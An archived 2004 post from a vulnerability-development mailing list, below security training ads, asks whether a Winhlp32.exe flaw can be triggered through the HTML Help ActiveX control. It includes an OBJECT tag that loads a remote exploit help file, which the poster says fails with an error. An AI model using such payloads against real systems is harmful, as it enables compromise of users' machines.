Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

New Winhlp32.exe vuln

Subject: New Winhlp32.exe vuln
Date: Fri, 24 Dec 2004 18:53:52 -0500 (EST)
Can this vulnerability be exploited using the HTML help ActiveX control ?

I am trying:
<OBJECT
   id=winhelp
   type="application/x-oleobject"
   classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
   codebase="hhctrl.ocx#Version=5,02,3790,1194"
   width=100
   height=100

   <PARAM name="Command" value="WinHelp">
   <PARAM name="Button" value="Text:Exploit">
   <PARAM name="Item1"
value="http://www.xfocus.net/flashsky/icoExp/search.hlp";>MyWindow">

</OBJECT>

However, i get an error "This operation is allowed only within HTML help" ?

Is this approach wrong ?



<Prev in Thread] Current Thread [Next in Thread>
  • New Winhlp32.exe vuln, bad_son <=